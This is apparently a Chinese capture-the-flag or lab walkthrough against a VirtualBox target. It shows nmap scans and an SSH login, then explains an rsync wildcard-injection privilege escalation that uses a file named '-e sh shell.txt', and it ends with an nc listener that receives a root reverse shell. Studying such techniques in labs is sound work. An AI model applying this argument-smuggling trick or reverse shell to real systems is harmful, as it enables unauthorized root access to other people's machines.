┌──(root㉿kali)-[~/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-20 15:51 +0800 Nmap scan report for 192.168.2.1 Host is up (0.00072s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.00086s latency). MAC Address: 08:00:27:0D:49:EC (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.52 Host is up (0.00070s latency). MAC Address: 08:00:27:8B:F9:6A (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 8.16 seconds
靶机IP:192.168.2.52
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.52 Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-20 15:52 +0800 Nmap scan report for 192.168.2.52 Host is up (0.00056s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:8B:F9:6A (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 45.99 seconds
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.52 Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-20 15:53 +0800 Nmap scan report for 192.168.2.52 Host is up (0.00070s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-title: \xE9\x9D\x9E\xE4\xB8\xBB\xE6\xB5\x81\xE7\x82\xAB\xE9\x85\xB7\xE7\xA9\xBA\xE9\x97\xB4 | \xE6\xAC\xA2\xE8\xBF\x8E\xE5\x85\x89\xE4\xB8\xB4 |_http-server-header: Apache/2.4.62 (Debian) MAC Address: 08:00:27:8B:F9:6A (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.55 seconds
┌──(root㉿kali)-[~/miaosec] └─# ssh hyh@192.168.2.52 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html hyh@192.168.2.52's password: Linux Guoqing 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. hyh@Guoqing:~$ id uid=1001(hyh) gid=1001(hyh) groups=1001(hyh)
利用通配符欺骗rsync参数解析核心原理在于Shell的通配符展开机制与rsync的参数解析逻辑发生了错位。当你创建了一个名为-e sh shell.txt的文件时,Shell遇到rsync*.txt命令会先将*展开,导致原本作为文件名的字符串被直接平铺在命令行中,变成了rsync ... -e sh shell.txt...。rsync接收到这串指令后,并不区分哪些是用户手打的参数、哪些是文件名展开的,它会机械地将-e识别为“指定远程Shell’的选项,紧随其后的sh shell.txt(由于文件名包含空格)则被错误地解析为要执行的远程Shell命令,从而劫持了程序的执行流程。
成功获取到root权限
1 2 3 4 5 6
┌──(root㉿kali)-[~] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.2.4] from (UNKNOWN) [192.168.2.52] 44284 id uid=0(root) gid=0(root) groups=0(root)